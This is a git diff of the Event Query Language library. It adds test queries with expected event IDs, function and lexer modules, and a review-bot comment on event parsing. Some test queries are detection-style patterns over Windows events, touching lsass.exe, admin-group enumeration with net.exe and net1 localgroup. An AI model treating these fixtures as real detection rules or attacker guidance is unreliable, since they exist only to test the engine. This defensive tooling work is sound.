+join by unique_pid
+ [process where opcode=1]
+ [file where opcode=0 and file_name="svchost.exe"]
+ [file where opcode == 0 and file_name == "lsass.exe"]
+until [file where opcode == 2]'''
+expected_event_ids = []
+
+[queries.q073]
+query = '''
+join
+ [file where opcode=0 and file_name="svchost.exe"] by unique_pid
+ [process where opcode == 1] by unique_ppid'''
+expected_event_ids = [55, 56]
+
+[queries.q074]
+query = '''
+join by unique_pid
+ [process where opcode in (1,3) and process_name="python.exe"]
+ [file where file_name == "*.exe"]'''
+expected_event_ids = [54, 55]
+
+[queries.q075]
+query = '''
+join by user_name
+ [process where opcode in (1,3) and process_name="python.exe"]
+ [process where opcode in (1,3) and process_name == "smss.exe"]'''
+expected_event_ids = [48, 78]
+
+[queries.q076]
+query = '''
+join
+ [process where opcode in (1,3) and process_name="python.exe"]
+ [process where opcode in (1,3) and process_name == "smss.exe"]
+'''
+expected_event_ids = [48, 3, 50, 78]
+
+[queries.q077]
+expected_event_ids = []
+query = '''
+process where fake_field == "*"'''
+
+[queries.q078]
+expected_event_ids = [1, 2, 3, 4]
+query = '''
+process where fake_field != "*"
+| head 4'''
+
+[queries.q079]
+expected_event_ids = [1, 2, 3, 4]
+query = '''
+process where not (fake_field == "*")
+| head 4'''
+
+[queries.q080]
+expected_event_ids = []
+query = '''
+registry where invalid_field_name != null'''
+
+[queries.q081]
+expected_event_ids = []
+query = '''
+registry where length(bad_field) > 0'''
+
+[queries.q082]
+query = '''
+process where opcode == 1
+ and process_name in ("net.exe", "net1.exe")
+ and not (parent_process_name == "net.exe"
+ and process_name == "net1.exe")
+ and command_line == "*group *admin*" and command_line != "* /add*"'''
+expected_event_ids = [97]
+
+[queries.q083]
+expected_event_ids = [1, 55, 57, 63, 75304]
+query = '''
+any where true
+| unique event_type_full'''
+
+[queries.q084]
+query = '''
+process where opcode=1 and process_name in ("services.exe", "smss.exe", "lsass.exe")
+ and descendant of [process where process_name == "cmd.exe" ]'''
+expected_event_ids = [62, 68, 78]
+
+[queries.q085]
+query = '''
+process where process_name in ("services.exe", "smss.exe", "lsass.exe")
+ and descendant of [process where process_name == "cmd.exe" ]'''
+expected_event_ids = [62, 64, 68, 69, 78, 80]
+
+[queries.q086]
+query = '''
+process where opcode=2 and process_name in ("services.exe", "smss.exe", "lsass.exe")
+ and descendant of [process where process_name == "cmd.exe" ]'''
+expected_event_ids = [64, 69, 80]
+
+[queries.q087]
+query = '''
+process where process_name="svchost.exe"
+ and child of [file where file_name="svchost.exe" and opcode=0]'''
+expected_event_ids = [56, 58]
+
+[queries.q088]
+query = '''
+process where process_name="svchost.exe"
+ and not child of [file where file_name="svchost.exe" and opcode=0]
+| head 3'''
+expected_event_ids = [11, 13, 15]
+
+[queries.q089]
+query = '''
+process where process_name="lsass.exe"
+ and child of [
+ process where process_name="python.exe"
+ and child of [process where process_name="cmd.exe"]
+ ]
+'''
+expected_event_ids = [62, 64]
+
+[queries.q090]
+query = '''
+file where child of [
+ process where child of [
+ process where child of [process where process_name="*wsmprovhost.exe"]
+ ]
+]
+| tail 1'''
+expected_event_ids = [91]
+
+[queries.q091]
+query = '''
+file where process_name = "python.exe"
+| unique unique_pid'''
+expected_event_ids = [55, 95]
+
+[queries.q092]
+query = '''
+file where event of [process where process_name = "python.exe" ]
+| unique unique_pid'''
+expected_event_ids = [55, 95]
+
+[queries.q093]
+query = '''
+process where process_name = "python.exe"'''
+expected_event_ids = [48, 50, 51, 54, 93]
+
+[queries.q094]
+query = 'process where event of [process where process_name = "python.exe" ]'
+expected_event_ids = [48, 50, 51, 54, 93]
+
+[queries.q095]
+query = '''
+sequence
+ [file where file_name="lsass.exe"] by file_path,process_path
+ [process where true] by process_path,parent_process_path
+'''
+expected_event_ids = [61, 62]
+
+[queries.q096]
+query = '''
+sequence by user_name
+ [file where file_name="lsass.exe"] by file_path, process_path
+ [process where true] by process_path, parent_process_path
+'''
+expected_event_ids = [61, 62]
+
+[queries.q097]
+query = '''
+sequence by pid
+ [file where file_name="lsass.exe"] by file_path,process_path
+ [process where true] by process_path,parent_process_path
+'''
+expected_event_ids = []
+
+[queries.q098]
+query = '''
+sequence by user_name
+ [file where opcode=0] by file_path
+ [process where opcode=1] by process_path
+ [process where opcode=2] by process_path
+ [file where opcode=2] by file_path
+| tail 1'''
+expected_event_ids = [88, 89, 90, 91]
+
+[queries.q099]
+query = '''
+sequence by user_name
+ [file where opcode=0] by pid,file_path
+ [file where opcode=2] by pid,file_path
+until [process where opcode=2] by ppid,process_path
+'''
+expected_event_ids = []
+
+[queries.q100]
+query = '''
+sequence
by user_name + [file where opcode=0] by pid,file_path + [file where opcode=2] by pid,file_path +until [process where opcode=5] by ppid,process_path +| head 2''' +expected_event_ids = [55, 59, 61, 65] + +[queries.q101] +query = ''' +sequence by pid + [file where opcode=0] by file_path + [process where opcode=1] by process_path + [process where opcode=2] by process_path + [file where opcode=2] by file_path +| tail 1''' +expected_event_ids = [] + +[queries.q102] +query = ''' +join by user_name + [file where true] by pid,file_path + [process where true] by ppid,process_path +| head 2''' +expected_event_ids = [55, 56, 59, 58] + +[queries.q103] +query = ''' +sequence + [process where true] by unique_pid + [file where true] fork=true by unique_pid + [process where true] by unique_ppid +| head 4''' +expected_event_ids = [54, 55, 56, 54, 61, 62, 54, 67, 68, 54, 72, 73] + +[queries.q104] +query = ''' +process where command_line == "*%*" ''' +expected_event_ids = [4, 6, 28] + +[queries.q105] +query = ''' +process where command_line == "*%*%*" ''' +expected_event_ids = [4, 6, 28] + +[queries.q106] +query = ''' +process where command_line == "%*%*" ''' +expected_event_ids = [4, 6, 28] + +[queries.q107] +expected_event_ids = [11, 60, 63] +query = ''' +any where process_name == "svchost.exe" +| unique_count event_type_full process_name''' + +[queries.q108] +expected_event_ids = [63, 60, 11] +query = ''' +any where process_name == "svchost.exe" +| sort event_type_full serial_event_id +| unique_count event_type_full process_name''' + +[queries.q109] +expected_event_ids = [60] +query = ''' +any where process_name == "svchost.exe" +| unique_count event_type_full opcode +| filter count == 7''' + +[queries.q110] +expected_event_ids = [11] +query = ''' +any where process_name == "svchost.exe" +| unique_count event_type_full opcode +| filter percent >= .5 +''' + +[queries.q111] +expected_event_ids = [57] +query = ''' +registry where arrayContains(bytes_written_string_list, 'En-uS')''' + 
+[queries.q112] +expected_event_ids = [57] +query = ''' +registry where arrayContains(bytes_written_string_list, 'En')''' + +[queries.q113] +expected_event_ids = [57] +query = ''' +registry where length(bytes_written_string_list) > 0 and bytes_written_string_list[0] == 'EN-us' +''' + +[queries.q114] +expected_event_ids = [57] +query = ''' +registry where bytes_written_string_list[0] == 'EN-us' +''' + +[queries.q115] +expected_event_ids = [57] +query = ''' +registry where bytes_written_string_list[1] == 'EN' +''' + +[queries.q116] +query = ''' +process where matchLite(?'.*?net1\s+localgroup\s+.*?', command_line) +''' +expected_event_ids = [98] + +[queries.q117] +query = ''' +process where matchLite(?'.*?net1\s+\w+\s+.*?', command_line) +''' +expected_event_ids = [98] + +[queries.q118] +query = ''' +process where matchLite(?'.*?net1\s+\w{4,15}\s+.*?', command_line) +''' +expected_event_ids = [98] + +[queries.q119] +expected_event_ids = [98] +query = ''' +process where match(?'.*?net1\s+\w{4,15}\s+.*?', command_line) +''' + +[queries.q120] +query = ''' +process where matchLite(?'.*?net1\s+[localgrup]{4,15}\s+.*?', command_line) +''' +expected_event_ids = [98] + +[queries.q121] +query = ''' +process where 'net.EXE' == original_file_name +| filter process_name="net*.exe" +''' +expected_event_ids = [97] +note = "check that case insensitive comparisons are performed even for lhs strings." + +[queries.q122] +query = ''' +process where process_name == original_file_name +| filter process_name='net*.exe' +''' +expected_event_ids = [97, 98] +note = "check that case insensitive comparisons are performed for fields." + +[queries.q123] +query = ''' +process where original_file_name == process_name +| filter length(original_file_name) > 0 +''' +expected_event_ids = [97, 98, 75273, 75303] +description = "check that case insensitive comparisons are performed for fields." 
+ +[queries.q124] +query = ''' +file where opcode=0 and startsWith(file_name, 'exploRER.') +''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q125] +query = ''' +file where opcode=0 and startsWith(file_name, 'expLORER.exe') +''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q126] +query = ''' +file where opcode=0 and endsWith(file_name, 'loREr.exe')''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q127] +query = ''' +file where opcode=0 and startsWith(file_name, 'explORER.EXE')''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q128] +query = ''' +file where opcode=0 and startsWith('explorer.exeaaaaaaaa', file_name)''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q129] +query = ''' +file where opcode=0 and serial_event_id = 88 and startsWith('explorer.exeaAAAA', 'EXPLORER.exe')''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q130] +query = ''' +file where opcode=0 and stringContains('ABCDEFGHIexplorer.exeJKLMNOP', file_name) +''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q131] +query = ''' +file where opcode=0 and indexOf(file_name, 'plore') == 2 and not indexOf(file_name, '.pf') +''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q132] +query = ''' +file where opcode=0 and indexOf(file_name, 'explorer.') and indexOf(file_name, 'plore', 100) +''' +expected_event_ids = [] +description = "check built-in string functions" + +[queries.q133] +query = ''' +file where opcode=0 and indexOf(file_name, 'plorer.', 0) == 2''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q134] +query = ''' +file where opcode=0 and indexOf(file_name, 'plorer.', 2)''' +expected_event_ids = [88, 92] 
+description = "check built-in string functions" + +[queries.q135] +query = ''' +file where opcode=0 and indexOf(file_name, 'plorer.', 4)''' +expected_event_ids = [] +description = "check built-in string functions" + +[queries.q136] +query = ''' +file where opcode=0 and indexOf(file_name, 'thing that never happened')''' +expected_event_ids = [] +description = "check built-in string functions" + +[queries.q137] +query = ''' +file where opcode=0 and indexOf(file_name, 'plorer.', 2) == 2''' +expected_event_ids = [88, 92] +description = "check substring ranges" + +[queries.q138] +query = ''' +file where opcode=0 and indexOf(file_name, 'explorer.', 0) == 0''' +expected_event_ids = [88, 92] +description = "check substring ranges" + +[queries.q139] +query = ''' +file where serial_event_id=88 and substring(file_name, 0, 4) == 'expl' +''' +expected_event_ids = [88] +description = "check substring ranges" + +[queries.q140] +query = ''' +file where serial_event_id=88 and substring(file_name, 1, 3) == 'xp' +''' +expected_event_ids = [88] +description = "chaeck substring ranges" + +[queries.q141] +query = ''' +file where serial_event_id=88 and substring(file_name, -4) == '.exe' +''' +expected_event_ids = [88] +description = "check substring ranges" + +[queries.q142] +query = ''' +file where serial_event_id=88 and substring(file_name, -4, -1) == '.ex' +''' +expected_event_ids = [88] +description = "check substring ranges" + +[queries.q143] +query = ''' +process where add(serial_event_id, 0) == 1 and add(0, 1) == serial_event_id''' +expected_event_ids = [1] +description = "test built-in math functions" + +[queries.q144] +query = ''' +process where subtract(serial_event_id, -5) == 6''' +expected_event_ids = [1] +description = "test built-in math functions" + +[queries.q145] +query = ''' +process where multiply(6, serial_event_id) == 30 and divide(30, 4.0) == 7.5''' +expected_event_ids = [5] +description = "test built-in math functions" + +[queries.q146] +query = ''' +process where 
modulo(11, add(serial_event_id, 1)) == serial_event_id''' +expected_event_ids = [1, 2, 3, 5, 11] +description = "test built-in math functions" + +[queries.q147] +query = ''' +process where serial_event_id == number('5')''' +expected_event_ids = [5] +description = "test string/number conversions" + +[queries.q148] +expected_event_ids = [50] +description = "test string/number conversions" +query = ''' +process where serial_event_id == number('0x32', 16)''' + +[queries.q149] +expected_event_ids = [50] +description = "test string/number conversions" +query = ''' +process where serial_event_id == number('32', 16)''' + +[queries.q150] +query = ''' +process where number(serial_event_id) == number(5)''' +expected_event_ids = [5] +description = "test string/number conversions" + +[queries.q151] +query = ''' +process where concat(serial_event_id, ':', process_name, opcode) == '5:winINIT.exe3' +''' +expected_event_ids = [5] +description = "test string concatenation" + +[queries.q152] +query = ''' +process where process_name != original_file_name +| filter length(original_file_name) > 0''' +expected_event_ids = [] +description = "check that case insensitive comparisons are performed for fields." 
+ +[queries.q153] +query = ''' +sequence by unique_pid [process where opcode=1 and process_name == 'msbuild.exe'] [network where true]''' +expected_event_ids = [75273, 75304] +description = "test that process sequences are working correctly" + +[queries.q154] +expected_event_ids = [57] +description = "test arraySearch functionality for lists of strings, and lists of objects" +query = ''' +registry where arraySearch(bytes_written_string_list, a, a == 'en-us')''' + +[queries.q155] +expected_event_ids = [57] +description = "test arraySearch functionality for lists of strings, and lists of objects" +query = ''' +registry where arraySearch(bytes_written_string_list, a, endsWith(a, '-us'))''' + +[queries.q156] +expected_event_ids = [75305] +description = "test arraySearch - true" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, s, true) +''' + +[queries.q157] +expected_event_ids = [] +description = "test arraySearch - false" +query = ''' +network where mysterious_field and arraySearch(mysterious_field.subarray, s, false) +''' + +[queries.q158] +expected_event_ids = [75305] +description = "test arraySearch - conditional" +query = ''' +network where mysterious_field and arraySearch(mysterious_field.subarray, s, s.a == 's0-*') +''' + +[queries.q159] +expected_event_ids = [75305] +description = "test arraySearch - conditional" +query = ''' +network where mysterious_field and arraySearch(mysterious_field.subarray, s, s.a != 's0-*') +''' + +[queries.q160] +expected_event_ids = [75305] +description = "test arraySearch - nested" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, sub1, + arraySearch(sub1.c, nested, nested.x.y == '*')) +''' + +[queries.q161] +expected_event_ids = [75305] +description = "test arraySearch - nested with cross-check pass" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, sub1, + sub1.a == 's0-a' and arraySearch(sub1.c, nested, 
nested.z == 's0-c1-x-z')) +''' + +[queries.q162] +expected_event_ids = [75305] +description = "test arraySearch - nested with cross-check pass" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, sub1, + sub1.a == 's0-a' and arraySearch(sub1.c, nested, nested.z == sub1.cross_match)) +''' + +[queries.q163] +expected_event_ids = [75305] +description = "test arraySearch - nested with cross-check pass" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, sub1, + arraySearch(sub1.c, nested, nested.x.y == mysterious_field.outer_cross_match)) +''' + +[queries.q164] +expected_event_ids = [] +description = "test 'safe()' wrapper for exception handling" +query = ''' +network where safe(divide(process_name, process_name)) +''' + +[queries.q165] +query = ''' +file where serial_event_id == 82 and (true == (process_name in ('svchost.EXE', 'bad.exe', 'bad2.exe'))) +''' +expected_event_ids = [82] +description = "nested set comparisons" + +[queries.q166] +expected_event_ids = [57] +query = ''' +registry where arrayCount(bytes_written_string_list, s, s == '*-us') == 1 +''' + +[queries.q167] +expected_event_ids = [57] +query = ''' +registry where arrayCount(bytes_written_string_list, s, s == '*en*') == 2 +''' + +[queries.q168] +expected_event_ids = [57] +query = ''' +registry where arrayContains(bytes_written_string_list, "ross", "en-US") +''' + +[queries.q169] +expected_event_ids = [11, 50] +description = "test window pipe" +query = ''' +process where subtype == "create" | +window 5m | +unique parent_process_name, process_name | +unique_count parent_process_name | +filter count == 5 +''' + +[queries.q170] +expected_event_ids = [55] +description = "test window pipe with descendant" +query = ''' +file where event_subtype_full == "file_create_event" + and descendant of [process where process_name == "cmd.exe"] | + window 5m | + unique_count process_name | + filter count == 5 +''' 
diff --git a/eql/events.py b/eql/events.py new file mode 100644 index 0000000..a00ba60 --- /dev/null +++ b/eql/events.py @@ -0,0 +1,43 @@ +"""Base class for constructing an analytic engine with analytics.""" +from collections import namedtuple + +from .schema import EVENT_TYPE_GENERIC +from .utils import is_string + + +class Event(namedtuple('Event', ['type', 'time', 'data'])): + """Event for python engine in EQL.""" + + @classmethod + def from_data(cls, data): + """Load an event from a dictionary. + + :param dict data: Dictionary with the event type, time, and keys. + """ + data = data.get('data_buffer', data) + timestamp = data.get('timestamp', 0) + + if is_string(data.get('event_type')): + event_type = data['event_type'] + elif 'event_type_full' in data: + event_type = data['event_type_full'] + if event_type.endswith('_event'): + event_type = event_type[:-len('_event')] + else: + event_type = EVENT_TYPE_GENERIC + + return cls(event_type, timestamp, data) + + def copy(self): + """Create a copy of the event.""" + data = self.data.copy() + return Event(self.type, self.time, data) + + +class AnalyticOutput(namedtuple('AnalyticOutput', ['analytic_id', 'events'])): + """AnalyticOutput for python engine in EQL.""" + + @classmethod + def from_data(cls, events, analytic_id=None): # type: (list[dict], str) -> AnalyticOutput + """Load up an analytic output event.""" + return cls(analytic_id, [Event.from_data(e) for e in events]) diff --git a/eql/functions.py b/eql/functions.py index 4dce625..6083fc9 100644 --- a/eql/functions.py +++ b/eql/functions.py 
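Review bot: `Event.from_data` dereferences `event_type_full` as a string before checking it: when the key is present but the value is not a string (e.g. `None`), `event_type.endswith('_event')` raises `AttributeError` instead of falling back to `EVENT_TYPE_GENERIC`; guard it the same way the `event_type` branch does, `elif is_string(data.get('event_type_full')):`. `Event.copy` only copies the top-level dict, so nested lists and sub-dicts (the test queries in this commit exercise fields such as `bytes_written_string_list` and `mysterious_field.subarray`) remain shared with the original; either say so in the docstring, `"""Create a shallow copy of the event; nested values in ``data`` are shared."""`, or use `copy.deepcopy` if any pipe mutates nested data. The module docstring ("Base class for constructing an analytic engine with analytics.") appears to be copied from another module and does not describe this file.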
@@ -1,20 +1,436 @@ """EQL functions.""" -builtins = ( - "add", - "arrayContains", - "arraySearch", - "concat", - "divide", - "endsWith", - "indexOf", - "length", - "modulo", - "multiply", - "number", - "startsWith", - "string", - "stringContains", - "substring", - "subtract", - "wildcard", +import re + +from .signatures import SignatureMixin +from .errors import EqlError +from .types import ( + STRING, NUMBER, BOOLEAN, VARIABLE, ARRAY, literal, PRIMITIVES, EXPRESSION, PRIMITIVE_ARRAY, is_literal, is_dynamic ) +from .utils import is_string, to_unicode, is_number + + +_registry = {} + + +def register(func): + """Register a function signature.""" + if func.name in _registry: + raise EqlError(u"Function {func.name} already registered. Unable to register {func}".format(func=func)) + + _registry[func.name] = func + return func + + +def list_functions(): + """Get a list of all current functions.""" + return list(sorted(_registry)) + + +class FunctionSignature(SignatureMixin): + """Helper class for declaring function signatures.""" + + name = str() + return_value = BOOLEAN + + @classmethod + def get_callback(cls, *arguments): + """Get a callback function for the AST.""" + return cls.run + + @classmethod + def run(cls, *arguments): + """Reference implementation of the function.""" + raise NotImplementedError() + + +def get_function(name): # type: (str) -> FunctionSignature + """Find a function in the registry.""" + return _registry.get(name) + + +# noinspection PyAbstractClass +class DynamicFunctionSignature(FunctionSignature): + """Function signature that can only be processed in a transpiler.""" + + @classmethod + def get_callback(cls, *arguments): + """Get a callback function for the AST.""" + raise NotImplementedError("Function {} can only be processed in a transpiler".format(cls.name)) + + +# noinspection PyAbstractClass +class MathFunctionSignature(FunctionSignature): + """Base signature for math functions.""" + + argument_types = [NUMBER, NUMBER] + return_value = 
NUMBER + + +@register +class Add(MathFunctionSignature): + """Add two numbers together.""" + + name = "add" + + @classmethod + def run(cls, x, y): + """Add two variables together.""" + if is_number(x) and is_number(y): + return x + y + + +@register +class ArrayContains(FunctionSignature): + """Check if ``value`` is a member of the array ``some_array``.""" + + name = "arrayContains" + argument_types = [PRIMITIVE_ARRAY, PRIMITIVES] + return_value = BOOLEAN + additional_types = PRIMITIVES + + @classmethod + def run(cls, array, *value): + """Search an array for a literal value.""" + values = [v.lower() if is_string(v) else v for v in value] + + if array is not None: + for v in array: + if is_string(v) and v.lower() in values: + return True + elif v in values: + return True + return False + + +@register +class ArrayCount(DynamicFunctionSignature): + """Search for matches to a dynamic expression in an array.""" + + name = "arrayCount" + argument_types = [ARRAY, VARIABLE, EXPRESSION] + return_value = NUMBER + + +@register +class ArraySearch(DynamicFunctionSignature): + """Search for matches to a dynamic expression in an array.""" + + name = "arraySearch" + argument_types = [ARRAY, VARIABLE, EXPRESSION] + return_value = BOOLEAN + + +@register +class Concat(FunctionSignature): + """Concatenate multiple values as strings.""" + + name = "concat" + additional_types = PRIMITIVES + minimum_args = 1 + return_value = STRING + + @classmethod + def run(cls, *arguments): + """Concatenate multiple values as strings.""" + output = [to_unicode(arg) for arg in arguments] + return "".join(output) + + +@register +class Divide(MathFunctionSignature): + """Divide numeric values.""" + + name = "divide" + + @classmethod + def run(cls, x, y): + """Divide numeric values.""" + if is_number(x) and is_number(y): + return float(x) / float(y) + + +@register +class EndsWith(FunctionSignature): + """Check if a string ends with a substring.""" + + name = "endsWith" + argument_types = [STRING, STRING] + 
return_value = BOOLEAN + + @classmethod + def run(cls, source, substring): + """Check if a string ends with a substring.""" + if is_string(source) and is_string(substring): + return source.lower().endswith(substring.lower()) + + +@register +class IndexOf(FunctionSignature): + """Check the start position of a substring.""" + + name = "indexOf" + argument_types = [STRING, STRING, NUMBER] + return_value = NUMBER + minimum_args = 2 + + @classmethod + def run(cls, source, substring, start=None): + """Check the start position of a substring.""" + if start is None: + start = 0 + + if is_string(source) and is_string(substring): + source = source.lower() + substring = substring.lower() + if substring in source[start:]: + return source.index(substring, start) + + +@register +class Length(FunctionSignature): + """Get the length of an array or string.""" + + name = "length" + argument_types = [(STRING, ARRAY)] + return_value = NUMBER + + @classmethod + def run(cls, array): + """Get the length of an array or string.""" + if is_string(array) or isinstance(array, (dict, list, tuple)): + return len(array) + return 0 + + +@register +class Match(FunctionSignature): + """Perform regular expression matching on a string.""" + + name = "match" + argument_types = [STRING, literal(STRING)] + return_value = BOOLEAN + additional_types = literal(STRING) + + @classmethod + def join_regex(cls, *regex): + """Convert a list of wildcards to a regular expression.""" + return "|".join(regex) + + @classmethod + def get_callback(cls, source_ast, *regex_literals): + """Get a callback function that uses the compiled regex.""" + regs = [reg.value for reg in regex_literals] + compiled = re.compile("|".join(regs), re.IGNORECASE | re.UNICODE) + + def callback(source, *_): + return is_string(source) and compiled.match(source) is not None + + return callback + + @classmethod + def validate(cls, arguments, type_hints=None): + """Validate the calling convention and change the argument order if necessary.""" + 
# used to have just two arguments and the pattern was on the left and expression on the right + if len(arguments) == 2 and type_hints and is_literal(type_hints[0]) and is_dynamic(type_hints[1]): + arguments = list(reversed(arguments)) + type_hints = list(reversed(type_hints)) + return super(Match, cls).validate(arguments, type_hints) + + @classmethod + def run(cls, source, *matches): + """Compare a string against a list of wildcards.""" + if isinstance(source, bytes): + source = source.decode("utf-8", "ignore") + + if is_string(source): + match = re.match("|".join(matches), source, re.IGNORECASE | re.UNICODE | re.MULTILINE | re.DOTALL) + return match is not None + + +@register +class MatchLite(Match): + """Perform lightweight regular expression matching on a string.""" + + name = "matchLite" + + +@register +class Modulo(MathFunctionSignature): + """Divide numeric values.""" + + name = "modulo" + + @classmethod + def run(cls, x, y): + """Divide numeric values.""" + if is_number(x) and is_number(y): + return x % y + + +@register +class Multiply(MathFunctionSignature): + """multiply numeric values.""" + + name = "multiply" + + @classmethod + def run(cls, x, y): + """Multiply numeric values.""" + if is_number(x) and is_number(y): + return x * y + + +@register +class Safe(FunctionSignature): + """Evaluate an expression and suppress exceptions.""" + + name = "safe" + argument_types = [EXPRESSION] + return_value = EXPRESSION + + +@register +class StartsWith(FunctionSignature): + """Check if a string starts with a substring.""" + + name = "startsWith" + argument_types = [STRING, STRING] + return_value = BOOLEAN + + @classmethod + def run(cls, source, substring): + """Check if a string ends with a substring.""" + if is_string(source) and is_string(substring): + return source.lower().startswith(substring.lower()) + + +@register +class StringContains(FunctionSignature): + """Check if a string is a substring of another.""" + + name = "stringContains" + argument_types = 
[STRING, STRING] + return_value = BOOLEAN + + @classmethod + def run(cls, source, substring): + """Check if a string is a substring of another.""" + if is_string(source) and is_string(substring): + return substring.lower() in source.lower() + return False + + +@register +class Substring(FunctionSignature): + """Extract a substring.""" + + name = "substring" + argument_types = [STRING, NUMBER, NUMBER] + return_value = STRING + minimum_args = 1 + + @classmethod + def run(cls, a, start=None, end=None): + """Extract a substring.""" + if is_string(a): + return a[start:end] + + +@register +class Subtract(MathFunctionSignature): + """Subtract two numbers.""" + + name = "subtract" + + @classmethod + def run(cls, x, y): + """Add two variables together.""" + if is_number(x) and is_number(y): + return x - y + + +@register +class ToNumber(FunctionSignature): + """Convert a string to a number.""" + + name = "number" + argument_types = [(STRING, NUMBER), NUMBER] + return_value = NUMBER + minimum_args = 1 + + @classmethod + def run(cls, source, base=10): + """Convert a string to a number.""" + if source is None: + return 0 + elif is_number(source): + return source + elif is_string(source): + if source.isdigit(): + return int(source, base) + elif source.startswith("0x"): + return int(source[2:], 16) + elif len(source.split(".")) == 2: + return float(source) + + +@register +class ToString(FunctionSignature): + """Convert a value to a string.""" + + name = "string" + argument_types = [PRIMITIVES] + return_value = STRING + + @classmethod + def run(cls, source): + """"Convert a value to a string.""" + return to_unicode(source) + + +@register +class Wildcard(FunctionSignature): + """Perform glob matching on a string.""" + + name = "wildcard" + argument_types = [STRING, literal(STRING)] + return_value = BOOLEAN + additional_types = literal(STRING) + + @classmethod + def to_regex(cls, *wildcards): + """Convert a list of wildcards to a regular expression.""" + expressions = [] + head = 
"^" + tail = "$" + + for wildcard in wildcards: + pieces = [re.escape(p) for p in wildcard.lower().split('*')] + regex = head + '.*?'.join(pieces) + tail + + tail_skip = '.*?$' + + if regex.endswith(tail_skip): + regex = regex[:-len(tail_skip)] + expressions.append(regex) + + return "|".join(expressions) + + @classmethod + def get_callback(cls, source_ast, *wildcard_literals): + """Get a callback function that uses the compiled regex.""" + wc_values = [wc.value for wc in wildcard_literals] + pattern = cls.to_regex(*wc_values) + compiled = re.compile(pattern, re.IGNORECASE | re.UNICODE) + + def callback(source, *_): + return is_string(source) and compiled.match(source) is not None + + return callback + + @classmethod + def run(cls, source, *wildcards): + """Compare a string against a list of wildcards.""" + pattern = cls.to_regex(*wildcards) + compiled = re.compile(pattern, re.IGNORECASE | re.UNICODE | re.MULTILINE | re.DOTALL) + return is_string(source) and compiled.match(source) is not None diff --git a/eql/highlighters.py b/eql/highlighters.py new file mode 100644 index 0000000..ce29c41 --- /dev/null +++ b/eql/highlighters.py 
@@ -0,0 +1,68 @@ +"""Highlighters for EQL.""" +from pygments.lexer import RegexLexer, bygroups, include +from pygments import token +from eql.functions import list_functions +from eql.pipes import list_pipes + + +class EqlLexer(RegexLexer): + """Pygments Lexer for EQL.""" + + name = 'Event Query Language' + aliases = ['eql'] + filenames = ['*.eql'] + + _sign = r'[\-+]' + _integer = r'\d+' + _float = r'\d*\.\d+([Ee][-+]?\d+)?' + _time_units = r's|sec\w+|m|min\w+|h|hour|hr|d|day' + _name = r'[a-zA-Z][_a-zA-Z0-9]*' + _pipe_names = set(list_pipes()) + + tokens = { + 'comments': [ + (r'//(\n|[\w\W]*?[^\\]\n)', token.Comment.Single), + (r'/[*][\w\W]*?[*]/', token.Comment.Multiline), + (r'/[*][\w\W]*', token.Comment.Multiline), + ], + 'whitespace': [ + (r'\s+', token.Whitespace), + ], + 'root': [ + include('whitespace'), + include('comments'), + (r'(and|in|not|or)\b', token.Operator.Word), # Keyword.Pseudo can also work + (r'(join|sequence|until|where)\b', token.Keyword), + (r'(%s)(=\s+)(where)\b' % _name, bygroups(token.Name, token.Whitespace, token.Keyword)), + (r'(const)(\s+)(%s)\b' % _name, bygroups(token.Keyword.Declaration, token.Whitespace, token.Name.Constant)), + (r'(macro)(\s+)(%s)\b' % _name, bygroups(token.Keyword.Declaration, token.Whitespace, token.Name.Constant)), + (r'(by|of|with)\b', token.Keyword.QueryModifier), + (r'(true|false|null)\b', token.Name.Builtin), + + # built in pipes + (r'(\|)(\s*)(%s)' % '|'.join(reversed(sorted(_pipe_names, key=len))), + bygroups(token.Operator, token.Whitespace, token.Name.Function.Magic)), + + # built in functions + (r'(%s)(\s*\()' % '|'.join(list_functions()), bygroups(token.Name.Function, token.Text)), + + # all caps names + (r'[A-Z][_A-Z0-9]+\b', token.Name.Other), + (_name, token.Name), + + # time units + (r'(%s|%s)[ \t]*(%s)\b' % (_float, _integer, _time_units), token.Literal.Date), + + (_sign + '?' + _float, token.Number.Float), + (_sign + '?' 
+ _integer, token.Number.Integer), + + # Continue matching strings until they are closed + (r'"(\\[btnfr"\'\\]|[^\r\n"\\])*"?', token.String), + (r"'(\\[btnfr'\"\\]|[^\r\n'\\])*'?", token.String), + (r'\?"(\\"|[^"])*"?', token.String.Regex), + (r"\?'(\\'|[^'])*'?", token.String.Regex), + + (r'(==|=|!=|<|<=|>=|>)', token.Operator), + (r'[()\[\],.]', token.Punctuation), + ] + } diff --git a/eql/loader.py b/eql/loader.py index 0428817..a3137aa 100644 --- a/eql/loader.py +++ b/eql/loader.py @@ -1,7 +1,7 @@ """Serialize analytics to and from disk.""" -from eql.ast import EqlAnalytic # noqa -from eql.parser import parse_analytic, parse_analytics -from eql.utils import load_dump, save_dump +from .ast import EqlAnalytic # noqa +from .parser import parse_analytic, parse_analytics +from .utils import load_dump, save_dump def load_analytic(filename): diff --git a/eql/main.py b/eql/main.py index 573db2b..3566160 100644 --- a/eql/main.py +++ b/eql/main.py @@ -6,13 +6,20 @@ import os import sys -from eql.engines.build import render_engine -from eql.engines.native import PythonEngine -from eql.errors import EqlError -from eql.loader import load_analytics, save_analytics -from eql.parser import parse_query -from eql.schema import use_schema -from eql.utils import load_dump, stream_stdin_events, stream_file_events +from .build import render_engine +from .engine import PythonEngine +from .errors import EqlError +from .loader import load_analytics, save_analytics +from .parser import parse_query +from .transpilers import TextEngine +from .utils import load_dump, stream_stdin_events, stream_file_events +from .walkers import ConfigurableWalker + +BANNER = "\n".join([ + "===================", + " EQL SHELL ", + "===================", +]) def build(args): 
